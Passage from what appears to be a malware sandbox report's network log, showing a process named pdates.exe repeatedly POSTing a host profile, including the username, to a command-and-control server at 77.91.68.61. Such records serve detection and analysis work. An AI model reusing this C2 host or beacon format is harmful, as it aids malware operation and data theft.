Jul 27, 2023 01:36:09.543148994 CEST	5865	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:09.592861891 CEST	5865	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
724	192.168.2.5	50446	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:09.758563042 CEST	5866	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:09.806938887 CEST	5866	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
725	192.168.2.5	50447	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:09.966010094 CEST	5867	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:10.014909983 CEST	5867	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
726	192.168.2.5	50448	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:10.167145967 CEST	5868	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:10.214884043 CEST	5868	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
727	192.168.2.5	50449	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:10.389134884 CEST	5868	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:10.437011003 CEST	5869	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
728	192.168.2.5	50450	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:10.607127905 CEST	5869	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:10.655791044 CEST	5870	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
729	192.168.2.5	50451	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:10.823321104 CEST	5870	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:10.871962070 CEST	5871	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.5	49790	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:22.797924042 CEST	2917	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:22.846404076 CEST	2917	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
730	192.168.2.5	50452	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:11.045559883 CEST	5871	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:11.094429970 CEST	5872	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
731	192.168.2.5	50453	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:11.259741068 CEST	5872	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:11.307533026 CEST	5873	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
732	192.168.2.5	50454	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:11.462811947 CEST	5873	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:11.514303923 CEST	5873	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
733	192.168.2.5	50455	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:11.692895889 CEST	5874	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:11.741086960 CEST	5874	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
734	192.168.2.5	50456	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:11.896604061 CEST	5875	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:11.944118977 CEST	5875	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
735	192.168.2.5	50457	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:12.100076914 CEST	5876	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:12.148327112 CEST	5876	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
736	192.168.2.5	50458	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:12.304229975 CEST	5877	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:12.352220058 CEST	5877	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
737	192.168.2.5	50459	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:12.507503033 CEST	5878	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:12.554950953 CEST	5878	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
738	192.168.2.5	50460	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:12.758398056 CEST	5879	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:12.806917906 CEST	5879	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
739	192.168.2.5	50461	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:12.965200901 CEST	5880	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:13.014790058 CEST	5880	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.5	49791	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:23.031143904 CEST	2918	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:23.078851938 CEST	2918	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
740	192.168.2.5	50462	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:13.182593107 CEST	5881	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:13.233550072 CEST	5881	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
741	192.168.2.5	50463	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:13.394745111 CEST	5882	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:13.443434954 CEST	5882	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
742	192.168.2.5	50464	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:13.604136944 CEST	5883	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:13.652570009 CEST	5883	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
743	192.168.2.5	50465	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:13.807885885 CEST	5884	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:13.856422901 CEST	5884	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
744	192.168.2.5	50466	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
